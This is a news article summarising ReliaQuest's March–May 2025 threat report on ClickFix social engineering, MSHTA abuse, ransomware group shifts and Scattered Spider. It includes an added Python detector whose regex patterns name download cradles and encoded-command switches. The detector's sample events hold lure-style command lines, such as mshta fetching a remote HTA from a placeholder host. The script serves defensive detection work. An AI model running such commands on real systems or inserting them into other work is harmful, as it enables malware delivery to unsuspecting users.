ReliaQuest report exposes rise of social engineering cyber threats

Techday NZ, 19-06-2025

ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease.
This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report identifies a shift in which attackers increasingly rely on user manipulation rather than on exploiting technical vulnerabilities.
ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake.
"ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
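The two sections above describe the same execution chain from the defender's side: a user is talked into typing a command into the Run prompt or PowerShell, and a native binary such as mshta.exe fetches the payload. The Python script below is an added example written for this page, not code from the ReliaQuest report or from Techday. It shows what that chain looks like in process-creation telemetry and how a simple rule separates it from ordinary interpreter use. The event fields are an assumption loosely modelled on Sysmon Event ID 1, and the sample events, user names, hosts and URLs are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added example; event shape is an assumption loosely based on Sysmon Event ID 1.
# The report names PowerShell, the Windows Run prompt and MSHTA as the tools
# ClickFix lures direct victims to; cmd.exe and pwsh.exe are added here as peers.
USER_LAUNCHABLE_INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

# Generic command-line indicators drawn from public detection guidance (assumed
# set, not strings taken from the report).
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden\b", re.I),
    "script_protocol": re.compile(r"\b(?:javascript|vbscript):", re.I),
    "download_cradle": re.compile(
        r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I
    ),
}


@dataclass(frozen=True)
class ProcessEvent:
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    user: str
    image: str
    reasons: List[str]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (accepts either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: ProcessEvent) -> Optional[Finding]:
    """Flag an event that has the shape of a ClickFix / MSHTA execution chain.

    Rule: (interpreter launched from explorer.exe AND at least one command-line
    indicator) OR (mshta.exe loading a remote HTA, whatever the parent).
    """
    image = basename(event.image)
    if image not in USER_LAUNCHABLE_INTERPRETERS:
        return None
    reasons: List[str] = []
    # explorer.exe as parent means the user started the process from the shell
    # (Win+R Run prompt, Start menu, double-click): the path a ClickFix lure uses.
    if basename(event.parent_image) == "explorer.exe":
        reasons.append("launched_from_explorer")
    reasons.extend(name for name, rx in INDICATORS.items() if rx.search(event.command_line))
    # mshta.exe pulling an HTA over the network is rarely legitimate on its own.
    if image == "mshta.exe" and "remote_url" in reasons:
        reasons.append("mshta_remote_hta")

    clickfix_shape = "launched_from_explorer" in reasons and len(reasons) >= 2
    if clickfix_shape or "mshta_remote_hta" in reasons:
        return Finding(event.user, image, reasons)
    return None


def scan(events: List[ProcessEvent]) -> List[Finding]:
    """Run analyse() over a batch of events and keep only the findings."""
    return [f for f in (analyse(e) for e in events) if f is not None]


# Constructed sample telemetry; users, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("CORP\\alice", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://captcha-check.invalid/verify.hta"),
    ProcessEvent("CORP\\bob", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="),
    # Vendor installer started by the service control manager: mshta with a local file.
    ProcessEvent("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\mshta.exe", r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    # An analyst opening an interactive PowerShell window from the Start menu.
    ProcessEvent("CORP\\carol", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # Scheduled build job: not user-launched and carries no lure-style switches.
    ProcessEvent("CORP\\svc_build", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\build\ci.ps1"),
    ProcessEvent("CORP\\dave", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.user}: {finding.image} -> {', '.join(finding.reasons)}")
```

Run against the constructed events, only the first two are flagged: the mshta.exe fetch of a remote HTA, and the explorer-launched PowerShell with a hidden window and an encoded command. An explorer parent by itself is deliberately not enough (carol's interactive PowerShell passes), and the installer and build job pass because they are neither user-launched nor carrying lure-style switches. In production the same rule would run over the EDR or Sysmon feed rather than a list, and the indicator set would be tuned to the environment's own baseline.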
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also recorded increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. The report states: "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces.
"Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is noted for using detailed social engineering against high-value individuals such as CFOs and for combining on-premises methods with cloud techniques for stealth and control. The report states: "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts.
Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed.
The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
